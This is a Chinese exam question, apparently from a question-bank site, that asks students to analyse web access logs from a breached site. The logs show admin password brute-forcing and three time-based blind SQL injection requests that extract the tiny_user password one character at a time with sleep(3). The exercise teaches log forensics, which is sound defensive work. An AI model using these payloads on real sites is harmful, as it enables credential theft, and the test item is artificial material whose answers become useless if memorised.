某Web站点被攻击者入侵,事后安全工程师获取到了该网站Web服务器的访问日...

发布于 2022-03-02 16:50:29

某Web站点被攻击者入侵,事后安全工程师获取到了该网站Web服务器的访问日志进行分析,题目中依照日志时间顺序列出7条可疑日志,请分析后作答:

172.17.0.1 [27/May/2019:07:32:52 +0000] "GET /admin.php?username=admin&password=1234567890 HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:07:32:53 +0000] "GET /admin.php?username=admin&password=michael HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:07:32:58 +0000] "GET /admin.php?username=admin&password=654321 HTTP/1.1" 200 284 "-" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:08:41:44 +0000] "GET /index.php?con=admin&act=index HTTP/1.1" 200 7718 "http://10.22.2.199/index.php?con=admin&act=payment_list" "Mozilla/5.0 (X11 Linux x86_64 rv:60.0) Gecko/20100101 Firefox/60.0"

172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='9',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"

172.17.0.1 [27/May/2019:08:41:57 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),1,1)='a',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"

172.17.0.1 [27/May/2019:08:42:00 +0000] "GET /index.php?con=goods&act=set_online&status=0&id=12)%20and%20if(substr((select%20password%20from%20tiny_user%20limit%200,1),2,1)='0',sleep(3),0)%23 HTTP/1.1" 302 - "-" "python-requests/2.20.0"

(1)从日志判断,攻击者在对该Web站点尝试哪些类型的攻击?

(2)从日志前4条判断,攻击者获取到了网站管理员的哪项敏感信息?并阐述你的分析思路和依据。

(3)从日志后3条判断,攻击者验证通过的一个字符是?并阐述你的分析思路和依据。

关注者
0
被浏览
81
举报
1 个回答
相关试卷
知识点
面圈网VIP题库

面圈网VIP题库全新上线,海量真题题库资源。 90大类考试,超10万份考试真题开放下载啦

去下载看看